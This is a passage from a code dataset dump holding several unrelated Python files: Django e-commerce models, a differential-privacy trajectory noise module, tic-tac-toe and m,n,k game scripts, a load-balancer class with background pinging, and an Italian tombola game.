__str__(self):\n return '{} - {}'.format(self.order.id, self.order.tracking_no)\n\n\n class Meta:\n verbose_name = 'Заказанный товар'\n verbose_name_plural = 'Заказанный товары'\n\nclass Order_product(models.Model):\n user = models.ForeignKey(to=User, on_delete=models.CASCADE)\n product_name = models.ForeignKey(Product, on_delete=models.CASCADE)\n size = models.PositiveIntegerField()\n quantity = models.PositiveIntegerField(default=1)\n\n\nclass Profile(models.Model):\n user = models.OneToOneField(\n User,\n on_delete=models.CASCADE,\n verbose_name='Пользователь')\n phone = models.CharField(\n max_length=150,\n null=False,\n verbose_name='Телефон номер')\n address = models.TextField(null=False, verbose_name='Адрес')\n created_at = models.DateTimeField(auto_now_add=True, verbose_name='Время')\n\n class Meta:\n verbose_name = 'Профиль'\n verbose_name_plural = 'Профили'\n\n def __str__(self):\n return self.user.username\n\n def get_rating(self):\n rating = Rating.objects.filter(client=self).aggregate(\n Avg('rating'))['rating__avg']\n return rating\n\n\nclass Сarousel(models.Model):\n name = models.CharField(max_length=150, verbose_name='Карусель', blank=False)\n image = models.ImageField(verbose_name='Image', upload_to='advertisement/')\n created_at = models.DateTimeField(\n verbose_name='Дата',\n auto_now=True,\n auto_now_add=False)\n\n def __str__(self):\n return self.name\n\n class Meta:\n db_table = 'advertisement_product'\n verbose_name = 'Карусель'\n verbose_name_plural = 'Карусели'\n\n\nclass Contacts(models.Model):\n name = models.CharField(max_length=150, verbose_name='Имя', null=False)\n gmail = models.CharField(max_length=150, verbose_name='Е-мейл', null=False)\n number = models.CharField(\n max_length=150,\n verbose_name='Телефон',\n null=False)\n message = models.CharField(\n max_length=150,\n verbose_name='Сообщение',\n null=False)\n created_at = models.DateTimeField(\n verbose_name='Дата',\n auto_now=True,\n auto_now_add=False)\n\n class Meta:\n verbose_name = 'Контакт'\n verbose_name_plural = 'Контакты'\n\n\nclass news_email(models.Model):\n email = models.CharField(max_length=150, verbose_name='Е-мейл', null=False)\n created_at = models.DateTimeField(auto_now_add=True, verbose_name='Время')\n\n class Meta:\n verbose_name = 'Новый емайл'\n verbose_name_plural = 'Новые емайлы'\n\n\nclass Profit(models.Model):\n report_per_day = models.PositiveBigIntegerField(\n null=False,\n verbose_name='Прибыль за один день')\n report_per_week = models.PositiveBigIntegerField(\n null=False,\n verbose_name='Прибыль за одну неделю')\n report_per_month = models.PositiveBigIntegerField(\n null=False,\n verbose_name='Прибыль за один месяц')\n report_per_season = models.PositiveBigIntegerField(\n null=False,\n verbose_name='Прибыль за один сезон')\n report_per_year = models.PositiveBigIntegerField(\n null=False,\n verbose_name='Прибыль за один год')\n report_per_all = models.PositiveBigIntegerField(\n null=False,\n verbose_name='Все прибыли')\n\n class Meta:\n verbose_name = 'Прибыль'\n verbose_name_plural = 'Прибыли'\n\n\nclass GoodsSold(models.Model):\n name_of_products = models.CharField(\n max_length=255, verbose_name='Имя товара')\n how_many_times_sold = models.CharField(\n max_length=255, verbose_name='Сколько раз продано')\n item_size = models.CharField(max_length=255, verbose_name='Размер товара')\n created_at = models.DateTimeField(auto_now_add=True, verbose_name='Время')\n\n class Meta:\n verbose_name = 'Проданный товар'\n verbose_name_plural = 'Проданные товары'\n\n\nclass Rating(models.Model):\n name_of_clients = models.CharField(\n null=False, max_length=255, verbose_name='Имя клиента')\n total_price = models.PositiveIntegerField(\n null=False, verbose_name='Сумма покупки')\n\n class Meta:\n verbose_name = 'Рейтинг'\n verbose_name_plural = 'Рейтинги'\n","repo_name":"abdullaev012/maasy_kg","sub_path":"store/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":12247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"12088048233","text":"#!/usr/bin/env python3\n# ------------------------------------------------------------------------------\n# Author: Erik Buchholz\n# E-mail: e.buchholz@unsw.edu.au\n# ------------------------------------------------------------------------------\n\"\"\"\nContains methods for the addition of Laplace noise.\n\nBelow, Jiang2013 refers to the following paper:\n\nJiang K, Shao D, Bressan S, Kister T, Tan K-L. Publishing trajectories with differential privacy guarantees.\nIn: Proceedings of the 25th International Conference on Scientific and Statistical Database Management - SSDBM.\nACM Press; 2013:1. doi:10.1145/2484838.2484846\n\n\"\"\"\nimport logging\nfrom typing import Union, Iterable, List, Callable, Any\n\nimport numpy as np\nimport pandas as pd\nimport scipy.stats as st\nfrom tqdm import tqdm\n\nfrom raopt.preprocessing.coordinates import latlon_to_xy, xy_to_latlon, check_coordinate_range\nfrom raopt.utils.helpers import get_latlon_arrays, set_latlon\n\n# -----------------------------CONSTANTS---------------------------------------\nSDD_THRESHOLD = 1000 # How many random numbers before giving up\n# -----------------------------CONSTANTS---------------------------------------\n\nlog = logging.getLogger()\n\n\ndef add_laplace_to_value(v: Union[float, Iterable[float]], mean: float, scale: float) -> Any:\n \"\"\"\n Add laplace noise to a single float value or a list of floats.\n :param v: Values to add noise to.\n :param mean: Mean value of distribution\n :param scale: Scale of distribution\n :return: The noised value(s)\n \"\"\"\n n = None\n if hasattr(v, \"__len__\"):\n n = len(v)\n return v + np.random.laplace(mean, scale, n)\n\n\ndef diff_private_laplace(\n v: Union[float, Iterable[float]], epsilon: float, sensitivity: float) -> Union[float, Iterable[float]]:\n \"\"\"\n Add laplace noise in order to achieve differential privacy.\n :param v: Value(s) to add noise to\n :param epsilon: Differential Privacy Parameter\n :param sensitivity: Sensitivity of Function\n :return: Noisy values\n \"\"\"\n return add_laplace_to_value(v, 0, sensitivity / epsilon)\n\n\ndef sphere_sampling(n: int, r: float) -> List[float]:\n \"\"\"\n See: Jiang2013\n\n :param n: Dimension\n :param r: Radius\n :return: Sampled point in R^n\n \"\"\"\n x = np.random.normal(0, 1, n)\n w = np.sqrt(np.sum(np.square(\n x\n )))\n z = r / w * x\n return z\n\n\ndef gnoise(\n x: np.ndarray, y: np.ndarray, epsilon: float, delta: float, M: float\n) -> (np.ndarray, np.ndarray):\n \"\"\"\n Implement global noise (GNoise) according to Jiang2013.\n Except, we add noise to all positions including start and end point.\n\n Note: epsilon-DP cannot be achieved\n\n :param x: x coordinates of trajectory\n :param y: y coordinates of trajectory\n :param epsilon: Differential Privacy Parameter\n :param delta: Differential Privacy Parameter\n :param M: Maximal Distance between two points of the trajectory\n :return: Modified X: np.ndarray, Modified Y: np.ndarray\n \"\"\"\n check_coordinate_range(x, y)\n assert len(x) == len(y)\n n = len(x)\n log.debug(f\"GNoise - Using M = {round(M)}m.\")\n\n if delta >= 1:\n log.error(\"Delta has to be smaller than one!\")\n raise RuntimeError(\"Delta has to be smaller than one!\")\n\n b = (2 * M / epsilon) + (2 * M / epsilon) * \\\n (2 * n - 1) * (1 / np.log(1. / (1. - delta)))\n\n log.debug(f\"GNoise: b = {b}\")\n\n # Sample noise\n r = np.random.exponential(b)\n\n z = sphere_sampling(2 * n, r)\n alpha = [z[i] for i in range(len(z)) if i % 2 == 0]\n beta = [z[i] for i in range(len(z)) if i % 2 == 1]\n\n assert alpha != beta\n assert len(alpha) == len(beta)\n assert len(alpha) == n\n\n # Add Noise\n res_x = x + alpha\n res_y = y + beta\n\n return res_x, res_y\n\n\ndef pnoise(\n x: np.ndarray, y: np.ndarray, epsilon: float, delta: float, M: float\n) -> (np.ndarray, np.ndarray):\n \"\"\"\n Implement point noise (PNoise) according to Jiang2013.\n Except, we add noise to all positions including start and end point.\n\n Note: epsilon-DP cannot be achieved\n\n :param x: x coordinates of trajectories\n :param y: y coordinates of trajectories\n :param epsilon: Differential Privacy Parameter\n :param delta: Differential Privacy Parameter\n :param M: Maximal Distance between two points of the trajectory\n :return: Modified X: np.ndarray, Modified Y: np.ndarray\n \"\"\"\n check_coordinate_range(x, y)\n assert len(x) == len(y)\n n = len(x)\n log.debug(f\"PNoise - Using M = {round(M)}m.\")\n\n if delta >= 1:\n log.error(\"Delta has to be smaller than one!\")\n raise RuntimeError(\"Delta has to be smaller than one!\")\n\n b = 2 * M / epsilon + 2 * M / (epsilon * np.log(1 / (1 - delta)))\n\n log.debug(f\"PNoise: b = {b}\")\n\n # Sample noise\n alpha, beta = [], []\n\n r = np.random.exponential(b, size=n)\n\n for i in range(n):\n z = sphere_sampling(2, r[i])\n alpha.append(z[0])\n beta.append(z[1])\n\n assert alpha != beta\n assert len(alpha) == len(beta)\n assert len(alpha) == n\n\n # Add Noise\n res_x = x + alpha\n res_y = y + beta\n\n return res_x, res_y\n\n\ndef cnoise(\n x: np.ndarray, y: np.ndarray, epsilon: float, M: float\n) -> (np.ndarray, np.ndarray):\n \"\"\"\n Implement coordinate noise (CNoise) according to Jiang2013.\n Except, we add noise to all positions including start and end point.\n\n Note: epsilon-DP CAN be achieved\n\n :param x: x coordinates of trajectories\n :param y: y coordinates of trajectories\n :param epsilon: Differential Privacy Parameter\n :param M: Maximal Distance between two points of the trajectory\n :return: Modified X: np.ndarray, Modified Y: np.ndarray\n \"\"\"\n check_coordinate_range(x, y)\n assert len(x) == len(y)\n n = len(x)\n log.debug(f\"CNoise - Using M = {round(M)}m.\")\n\n b = 2 * np.sqrt(2) * M / epsilon\n\n log.debug(f\"CNoise: b = {b}\")\n\n # Sample noise\n alpha = np.random.laplace(0, b, n)\n beta = np.random.laplace(0, b, n)\n\n assert len(alpha) == len(beta)\n assert len(alpha) == n\n\n # Add Noise\n res_x = x + alpha\n res_y = y + beta\n\n return res_x, res_y\n\n\ndef _compute_C(a: float, B: float, eps: float) -> float:\n \"\"\"Compute the C value from Jiang2013\"\"\"\n if a < B:\n C_inv = (8 * B / eps) * (\n 2 - np.exp(- a * eps / (8 * B)) -\n np.exp(- eps * (B - a) / (8 * B))\n )\n else:\n C_inv = 8 * B / eps * \\\n (np.exp(- (a - B) * eps / (8 * B)) - np.exp(- eps * a / (8 * B)))\n return 1.0 / C_inv\n\n\ndef get_exp_pdf(C: float, a: float, B: float, eps: float) -> Callable:\n def pdf(x):\n return C * np.exp(- eps * abs(x - a) / (8 * B))\n\n return pdf\n\n\ndef exponential_mechanism(a: float, B: float, eps: float) -> st.rv_continuous:\n \"\"\"\n Return the distribution to sample from.\n Sample with my_cv.rvs(size=1).\n\n :param a: lower bound (positive)\n :param B: upper bound (positive)\n :param eps: Epsilon differential private parameter\n :return:\n \"\"\"\n\n # Compute C\n C = _compute_C(a, B, eps)\n\n pdf = get_exp_pdf(C, a, B, eps)\n\n class my_pdf(st.rv_continuous):\n # noinspection PyMethodOverriding\n def _pdf(self, x):\n return pdf(x)\n\n my_cv: st.rv_continuous = my_pdf(a=0, b=B, name='PDF Dist')\n\n # Sampling:\n # sample = my_cv.rvs(size=1)[0]\n\n return my_cv\n\n\ndef unit_vector(v: np.array) -> float:\n \"\"\" Returns the unit vector of the v. \"\"\"\n return v / np.linalg.norm(v)\n\n\ndef angle_between(v1, v2):\n \"\"\" Returns the angle in radians between vectors 'v1' and 'v2'::\n\n >>> angle_between((1, 0, 0), (0, 1, 0))\n 1.5707963267948966\n >>> angle_between((1, 0, 0), (1, 0, 0))\n 0.0\n >>> angle_between((1, 0, 0), (-1, 0, 0))\n 3.141592653589793\n \"\"\"\n v1_u = unit_vector(v1)\n v2_u = unit_vector(v2)\n return np.arccos(np.clip(np.dot(v1_u, v2_u), -1.0, 1.0))\n\n\nclass StuckException(RuntimeError):\n \"\"\"Raise if SDD mechanism gets stuck\"\"\"\n\n\ndef _sdd_step(prev: np.ndarray, destination: np.ndarray, epsilon: float, M: float,\n n: int, i: int, endpoint: np.ndarray, abort_if_stuck=True) -> np.ndarray:\n v = destination - prev\n r_i = np.linalg.norm(v)\n angle = angle_between(destination, prev)\n roh_gen = exponential_mechanism(r_i, M, epsilon)\n alpha_gen = exponential_mechanism(angle, 2 * np.pi, epsilon)\n trials = 0\n guesses = {}\n while True:\n trials += 1\n roh = roh_gen.rvs(size=1)[0]\n alpha = alpha_gen.rvs(size=1)[0]\n new = prev + np.array((roh * np.cos(alpha), roh * np.sin(alpha)))\n distance = np.linalg.norm(new - endpoint)\n if distance <= (n + 1 - i) * M:\n return new\n else:\n guesses[distance] = new\n if trials > SDD_THRESHOLD:\n # Stuck\n if abort_if_stuck:\n raise StuckException(\n f\"SDD mechanism is stuck at i = {i}. \"\n f\"Allowed Distance: {n + 1 - i}M, \"\n f\"Current Distance: {round(np.linalg.norm(new - endpoint) / M, 2)}M\")\n else:\n # Just use the best value, violates definition of SDD\n value = guesses[min(guesses.keys())]\n dist = np.linalg.norm(value - endpoint) / M\n log.warning(\n f'Using a value violating line 11 '\n f'(Distance: {round(dist, 2)}M vs {round(n + 1 - i, 2)}M) for i = {i}')\n return value\n\n\ndef sdd(\n x: np.ndarray,\n y: np.ndarray,\n epsilon: float,\n M: float,\n noisy_endpoints: bool = True,\n show_progress=False,\n enforce_line11=False\n) -> (np.ndarray, np.ndarray):\n \"\"\"\n Implement the SDD mechanism from Jiang2013.\n Except, we add noise to all positions including start and end point, if the flag is set.\n\n Note: epsilon-DP CAN be achieved\n\n :param x: x coordinates of trajectories\n :param y: y coordinates of trajectories\n :param epsilon: Differential Privacy Parameter\n :param M: Maximal Distance between two points of the trajectory\n :param noisy_endpoints: If start and endpoint should be modified\n :param show_progress: Display progressbar\n :param enforce_line11: Restart until proper noise is found\n :return: Modified X: np.ndarray, Modified Y: np.ndarray\n :raises StuckException: If line 11 (in the paper) cannot be satisfied after a certain threshold\n \"\"\"\n # Check coordinate type\n check_coordinate_range(x, y) # Check if lat/lon or meters is used\n assert len(x) == len(y) # Verify that x and y belong together\n\n n = len(x)\n # In the paper, the indices start at 0 and end at n + 1. Main loop goes from 1 to n only.\n alg_n = n - 2\n\n log.debug(f\"SDD - Using M = {round(M)}m.\")\n\n # The algorithm can get stuck at line 11\n # For proper result, we cannot return a value, in this case.\n # It is unclear why this is not a problem in the paper.\n # We assume that they only tested the mechanism on short trajectories,\n # and the problems only occurs for longer ones.\n abort_if_stuck = enforce_line11\n\n # Result array\n res_x, res_y = np.zeros(n), np.zeros(n)\n\n startpoint = np.array((x[0], y[0]))\n res_x[0], res_y[0] = startpoint\n endpoint = np.array((x[-1], y[-1]))\n res_x[-1], res_y[-1] = endpoint\n log.debug(f\"Startpoint: {str(startpoint)}, Endpoint: {str(endpoint)}\")\n\n loop = range(1, n - 1)\n if show_progress:\n loop = tqdm(loop, leave=True, ncols=120)\n\n for i in loop:\n orig = np.array((x[i], y[i]))\n prev = np.array((res_x[i - 1], res_y[i - 1]))\n new = _sdd_step(prev=prev, destination=orig, epsilon=epsilon, M=M, n=alg_n, i=i,\n endpoint=endpoint, abort_if_stuck=abort_if_stuck)\n res_x[i], res_y[i] = new\n\n if noisy_endpoints:\n # In case the flag is set, we also add noise to start and end point in the straight forward way\n # Last Point\n prev = np.array((res_x[-2], res_y[-2]))\n new = _sdd_step(prev, endpoint, epsilon, M=M, n=n - 1, i=n - 1,\n endpoint=endpoint, abort_if_stuck=abort_if_stuck)\n res_x[-1], res_y[-1] = new\n\n # First Point\n prev = np.array((res_x[1], res_y[1]))\n new = _sdd_step(prev, startpoint, epsilon, M=M, n=alg_n, i=0,\n endpoint=endpoint, abort_if_stuck=abort_if_stuck)\n res_x[0], res_y[0] = new\n\n return res_x, res_y\n\n\ndef execute_mechanism(df: pd.DataFrame, mechanism: Callable, lat0: float, lon0: float,\n convert: bool = True,\n args: Iterable = (), kwargs: dict = {}) -> pd.DataFrame:\n \"\"\"\n Execute the given mechanism on the DataFrame.\n :param df: Dataframe that is input\n :param mechanism: The mechanism to execute\n :param lat0: For some conversion methods we need a reference latitude\n :param lon0: For some conversion methods we need a reference longitude\n :param convert: Convert coordinates to meter first\n :param args: Other arguments for mechanism\n :param kwargs: Other arguments for mechanism\n :return:\n \"\"\"\n df = df.copy()\n lat, lon = get_latlon_arrays(df)\n if convert:\n lat, lon = latlon_to_xy(lat, lon, lat0, lon0)\n lat, lon = mechanism(lat, lon, *args, **kwargs)\n if convert:\n lat, lon = xy_to_latlon(lat, lon, lat0, lon0)\n df = set_latlon(df, lat, lon)\n return df\n","repo_name":"erik-buchholz/RAoPT","sub_path":"raopt/dp/sdd.py","file_name":"sdd.py","file_ext":"py","file_size_in_byte":13522,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"27"} +{"seq_id":"23956686008","text":"'''\n X | O | X\n---+---+---\n O | O | X \n---+---+---\n | X | \n'''\n\nimport random\n\n\ndef print_board_and_legend(board):\n for i in range(3):\n line1 = \" \" + board[i][0] + \" | \" + board[i][1] + \" | \" + board[i][2]\n line2 = \" \" + str(3*i+1) + \" | \" + str(3*i+2) + \" | \" + str(3*i+3) \n print(line1 + \" \"*5 + line2)\n if i < 2:\n print(\"---+---+---\" + \" \"*5 + \"---+---+---\")\n \n \n \ndef make_empty_board():\n board = []\n for i in range(3):\n board.append([\" \"]*3)\n return board\n \ndef spot_empty(square_num):\n return board[(square_num - 1) // 3][(square_num-1)%3]==\" \"\ndef put_X_O():\n global turn\n choice = turn\n return choice\ndef take_input():\n print('Enter your move:')\n square_num = input() \n while not spot_empty(square_num) or type(square_num)!=int or square_num>9 or square_num<1:\n print('Error, please re-enter:')\n square_num = input() \n board[(square_num - 1) // 3][(square_num-1)%3]=put_X_O()\n free_squares.remove([(square_num - 1) // 3, (square_num-1)%3])\ndef get_free_squares():\n return free_squares\ndef make_random_move(board, mark):\n position = free_squares[int(len(free_squares)*random.random())]\n board[position[0]][position[1]]=mark\n free_squares.remove(position)\ndef make_smart_move(board, mark):\n for x, y in free_squares:\n board[x][y]=mark\n if is_win(board, turn):\n free_squares.remove([x,y])\n return\n else:\n board[x][y]=\" \"\n make_random_move(board, mark)\ndef is_row_all_marks(board, row_i, mark):\n return board[row_i]==[mark, mark, mark]\ndef is_diaganal_all_marks(board, mark):\n lr= (board[0][0]==board[1][1] and board[1][1]==mark and board[2][2]==mark) \n rl= (board[2][0]==board[1][1] and board[1][1]==mark and board[0][2]==mark)\n return rl or lr\ndef is_col_all_marks(board, col_i, mark):\n return board[0][col_i]==mark and board[1][col_i]==mark and board[2][col_i]==mark\ndef is_win(board, mark):\n for i in range(3):\n if is_col_all_marks(board, i, mark): return True\n if is_row_all_marks(board, i, mark): return True\n if is_diaganal_all_marks(board, mark): return True\n return False\n \nif __name__ == '__main__':\n global free_squares\n free_squares=[[x,y] for x in range(3) for y in range (3)]\n global board\n board = make_empty_board()\n global turn\n turn = \"X\"\n for i in range (9):\n if i%2==0: take_input()\n else: make_smart_move(board, put_X_O())\n print_board_and_legend(board)\n if is_win(board, turn): \n print(turn,\"wins!\")\n break\n turn = turn ==\"X\" and \"O\" or \"X\"\n","repo_name":"Xiao215/ESC180","sub_path":"Lab6/ttt.py","file_name":"ttt.py","file_ext":"py","file_size_in_byte":2684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"21136150985","text":"\nclass Vector:\n\tdef __init__(this, x, y):\n\t\tthis.x = x\n\t\tthis.y = y\n\tdef __str__(this):\n\t\treturn '({}, {})'.format(this.x, this.y)\n\nclass Game:\n\tdef __init__(this, x, y, limit):\n\t\tthis.limit = limit\n\t\tthis.board = [['' for i in range(0, x)] for j in range(0, y)]\n\n\tdef has_winner(this):\n\t\tfor y in range(0, len(this.board)):\n\t\t\tfor x in range(0, len(this.board[y])):\n\t\t\t\tif this._consecutive_matches(Vector(x, y), None) == this.limit - 1:\n\t\t\t\t\treturn this.board[y][x]\n\t\treturn 'no winner found';\n\n\tdef _consecutive_matches(this, location, direction):\n\t\tif location.x == len(this.board[0]) or location.y == len(this.board):\n\t\t\treturn 0\n\t\telif direction is None:\n\t\t\thighest = 0\n\t\t\tfor direction in [Vector(-1,1),Vector(0,1),Vector(1,1),Vector(1,0)]:\n\t\t\t\tif this._is_match(location, direction):\n\t\t\t\t\tresult = this._consecutive_matches(Vector(location.x + direction.x, location.y + direction.y), direction) + 1\n\t\t\t\t\tif result > highest:\n\t\t\t\t\t\thighest = result\n\t\t\treturn highest\n\t\telif this._is_match(location, direction):\n\t\t\treturn this._consecutive_matches(Vector(location.x + direction.x, location.y + direction.y), direction) + 1\n\t\treturn 0\n\n\tdef _is_match(this, location, direction):\n\t\treturn (location.x + direction.x < len(this.board[0]) and\n\t\t\t\tlocation.y + direction.y < len(this.board) and\n\t\t\t\tthis.board[location.y][location.x] == this.board[location.y + direction.y][location.x + direction.x])\n\ngame = Game(5,4,4)\ngame.board = [['o','x','o','x','o'],\n\t\t\t ['x','x','x','o','o'],\n\t\t\t ['x','x','o','x','x'],\n\t\t\t ['o','o','o','x','o']]\nprint(game.has_winner())","repo_name":"KevinSShaffer/m-n-k","sub_path":"mnk.py","file_name":"mnk.py","file_ext":"py","file_size_in_byte":1566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"32017085398","text":"import logging\nimport threading\nimport time\nfrom ballast.discovery import ServerList\nfrom ballast.rule import Rule, RoundRobinRule\nfrom ballast.ping import (\n Ping,\n SocketPing,\n PingStrategy,\n SerialPingStrategy\n)\n\n\nclass LoadBalancer(object):\n\n DEFAULT_PING_INTERVAL = 30\n MAX_PING_TIME = 3\n\n def __init__(self, server_list, rule=None, ping_strategy=None, ping=None, ping_on_start=True):\n\n assert isinstance(server_list, ServerList)\n assert rule is None or isinstance(rule, Rule)\n assert ping_strategy is None or isinstance(ping_strategy, PingStrategy)\n assert ping is None or isinstance(ping, Ping)\n\n # some locks for thread-safety\n self._lock = threading.Lock()\n self._server_lock = threading.Lock()\n\n self._rule = rule \\\n if rule is not None \\\n else RoundRobinRule()\n\n self._ping_strategy = ping_strategy \\\n if ping_strategy is not None \\\n else SerialPingStrategy()\n\n self._ping = ping \\\n if ping is not None \\\n else SocketPing()\n\n self.max_ping_time = self.MAX_PING_TIME\n self._ping_interval = self.DEFAULT_PING_INTERVAL\n self._server_list = server_list\n self._servers = set()\n self._stats = LoadBalancerStats()\n self._rule.load_balancer = self\n self._logger = logging.getLogger(self.__module__)\n\n # start our background worker\n # to periodically ping our servers\n self._ping_timer_running = False\n self._ping_timer = None\n if ping_on_start:\n self._start_ping_timer()\n\n @property\n def ping_interval(self):\n return self._ping_interval\n\n @ping_interval.setter\n def ping_interval(self, value):\n self._ping_interval = value\n\n if self._ping_timer_running:\n self._stop_ping_timer()\n self._start_ping_timer()\n\n @property\n def max_ping_time(self):\n if self._ping is None:\n return 0\n return self._ping.max_ping_time\n\n @max_ping_time.setter\n def max_ping_time(self, value):\n if self._ping is not None:\n self._ping.max_ping_time = value\n\n @property\n def stats(self):\n return self._stats\n\n @property\n def servers(self):\n with self._server_lock:\n return set(self._servers)\n\n @property\n def reachable_servers(self):\n with self._server_lock:\n servers = set()\n for s in self._servers:\n if s.is_alive:\n servers.add(s)\n\n return servers\n\n def choose_server(self):\n\n # choose a server, will\n # throw if there are none\n server = self._rule.choose()\n\n return server\n\n def mark_server_down(self, server):\n self._logger.debug(\"Marking server down: %s\", server)\n server._is_alive = False\n\n def ping(self, server=None):\n if server is None:\n self._ping_all_servers()\n else:\n is_alive = self._ping.is_alive(server)\n server._is_alive = is_alive\n\n def ping_async(self, server=None):\n if server is None:\n # self._ping_all_servers()\n t = threading.Thread(name='ballast-worker', target=self._ping_all_servers)\n t.daemon = True\n t.start()\n else:\n is_alive = self._ping.is_alive(server)\n server._is_alive = is_alive\n\n def _ping_all_servers(self):\n with self._server_lock:\n results = self._ping_strategy.ping(\n self._ping,\n self._server_list\n )\n self._servers = set(results)\n\n def _start_ping_timer(self):\n\n with self._lock:\n if self._ping_timer_running:\n self._logger.debug(\"Background pinger already running\")\n return\n\n self._ping_timer_running = True\n self._ping_timer = threading.Thread(name='ballast-worker', target=self._ping_loop)\n self._ping_timer.daemon = True\n self._ping_timer.start()\n\n def _stop_ping_timer(self):\n with self._lock:\n self._ping_timer_running = False\n self._ping_timer = None\n\n def _ping_loop(self):\n while self._ping_timer_running:\n try:\n self._ping_all_servers()\n except BaseException as e:\n self._logger.error(\"There was an error pinging servers: %s\", e)\n\n time.sleep(self._ping_interval)\n\n\nclass LoadBalancerStats(object):\n\n def get_server_stats(self, server):\n pass\n","repo_name":"thomasstreet/ballast","sub_path":"ballast/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":4607,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"27"} +{"seq_id":"18591499934","text":"import Utils\nimport Tabellone\nimport Giocatori\nimport Regolamento\n\ntry:\n parser = Utils.initialize_parser()\n n_giocatori=parser.g\n n_cartelle=parser.n\n if n_cartelle==None or n_giocatori==None:\n print('Digita -h per vedere gli argomenti sulla linea di comando')\n exit()\n if (Utils.numero_giocatori(n_giocatori)) and (Utils.confronta_lista_cartelle(n_giocatori,n_cartelle) and Utils.numero_cartelle(n_cartelle)): #si verifica che i parametri passati dall utente siano conformi con le prerogative del programma\n '''Nella fase preliminare del gioco si assegnano le cartelle ai giocatori'''\n lista_giocatori=[]\n for i in range(n_giocatori):\n giocatore=Giocatori.Giocatori(n_cartelle[i]) #ad ogni giocatore si fa corrispondere il numero di cartelle scelto\n giocatore.assegnazione()\n lista_giocatori.append(giocatore)\n \n \n\n tabellone=Tabellone.Tabellone() #istanzo il tabellone\n\n '''Permette le visualizzazione delle cartelle assegnate ai vari giocatori'''\n for i in range(len(lista_giocatori)):\n n=n_cartelle[i]\n print('Giocatore ', i+1)\n for j in range(n):\n lista_giocatori[i].visualizza_cartella(j).stampa()\n\n regole=Regolamento.Regolamento() #istanzo il regolamento\n\n input(\"Iniziare il gioco della tombola?\")\n\n estratti = list() #lista che contiene tutti i numeri estratti\n utlimi_estratti = list() #lista che contiene unicamente gli ultimi 6 numeri estratti\n exitcond=False # verrà trasformata in True quando uno dei giocatori effettua la tombola\n vincite=[0,1] #il riconoscimento della vincita si basa sull' numero di '-1' presenti su una cartella, vanno esclusi i casi in cui ci siano zero '-1' e un solo '-1' in quanto non vincenti \n\n while exitcond == False:\n estratti= Utils.estrazione(estratti)\n if len(utlimi_estratti)<=5: # finchè la lista numeri estratti è minore più piccola di 6 continuo aggiungo l' ultimo numero estratto\n utlimi_estratti.append(estratti[-1])\n else:\n utlimi_estratti.pop(0) # nel caso la lista sia già composta da 6 elementi devo eliminare il primo elemento della lista prima di aggiungerne una nuovo\n utlimi_estratti.append(estratti[-1])\n \n print('Gli ultimi estratti sono:',utlimi_estratti,'\\n\\n')\n\n '''Ad ogni estrazione si verifica se in tutte le cartelle è presente tale numere e in caso lo si sostituisce con un -1 (per convenzione)'''\n for i in range(len(lista_giocatori)):\n n=n_cartelle[i]\n for j in range(n):\n '''Si effettua una ricerca dell'ultimo numero estratto all'interno delle cartelle assegnate ai vari giocatori e come risultato se ne ricavano gli indici di posizione'''\n indici=lista_giocatori[i].visualizza_cartella(j).cerca_numero(estratti[-1])\n\n if len(indici[0]) !=0: # se esistono tali indici di posizione e quindi il numero è presente all intero di una tale cartella, si usano gli indici per sostituire in tale cartella il -1\n lista_giocatori[i].visualizza_cartella(j).inserisci_numero(indici[0],indici[1],-1)\n else:\n pass\n\n '''Analogamente si fa per il tabellone: si ricavano gli indici di posizione del numeri estratto e si usano per sostituirli con un '-1' \n NB: sono necessari 3 indici: il primo per specificare quale la cartella in cui si trova il numero estratto, i restanti per individuare all' interno della cartella (una matrice) la posizione del numero estratto\n '''\n indici_tab = tabellone.pos_numero_estratto_tabellone(estratti[-1])\n tabellone.sostituisci_numero_tabellone(indici_tab[0],indici_tab[1],indici_tab[2])\n\n '''Per ciascun giocatore i si verificano le possibili vincite''' \n for i in range(len(lista_giocatori)): \n n=n_cartelle[i]\n for j in range(n):\n exitcond=regole.verifica_vincite(lista_giocatori[i].visualizza_cartella(j))[1]\n if(exitcond == True): #se un giocatore ha effettuato la tombola termina il gioco\n print('FINE PARTITA: Il giocatore',i+1,'ha fatto Tombola nella cartella', j+1)\n for i in range(len(lista_giocatori)):\n n=n_cartelle[i]\n print('Giocatore ', i+1)\n for j in range(n):\n lista_giocatori[i].visualizza_cartella(j).stampa()\n exit()\n\n vincita=regole.verifica_vincite(lista_giocatori[i].visualizza_cartella(j))[0]\n if vincita not in vincite: #si verifica che tale vincita non sia stata già effettuata\n vincite.append(vincita)# se il giocatore è il primo ad effettuare una certa vincita si memorizza e si stampa il tipo di vincita\n if vincita == 2:\n print('Il Giocatore',i+1,'ha fatto ambo, nella cartella', j+1 )\n elif vincita == 3:\n print('Il Giocatore',i+1,'ha fatto terna, nella cartella', j+1 )\n elif vincita == 4:\n print('Il Giocatore',i+1,'ha fatto quaterna, nella cartella', j+1 )\n elif vincita == 5:\n print('Il Giocatore',i+1,'ha fatto cinquina, nella cartella', j+1 )\n \n '''Quando viene effettuata una nuova vincita si da l'opportunità all'utente di visualizzare le cartelle dei giocatori o di visualizzare i numeri estratti sul tabellone'''\n try:\n while True:\n print('Digita: \\n -1 per visualizzare le cartelle dei giocatori \\n -2 per visuializzare il cartellone \\n -premere invio per continuare a giocare\\n ')\n handle_richiesta= int(input('>'))\n if handle_richiesta==1:\n for i in range(len(lista_giocatori)):\n n=n_cartelle[i]\n print('Giocatore ', i+1)\n for j in range(n):\n lista_giocatori[i].visualizza_cartella(j).stampa()\n\n elif handle_richiesta==2:\n tabellone.visualizza_tabellone()\n else:\n break #qualunque valore diverso da 1 e 2 fa uscire del ciclo while \n except:\n pass\n \n else:\n pass\n\n '''Finchè un giocatore non realizza la tombola il programma domandi di effettuare nuove estrazioni''' \n input(\"Procedo con una nuova estrazione?\")\n else:\n exit()\nexcept:\n print(' ')\n\n\n 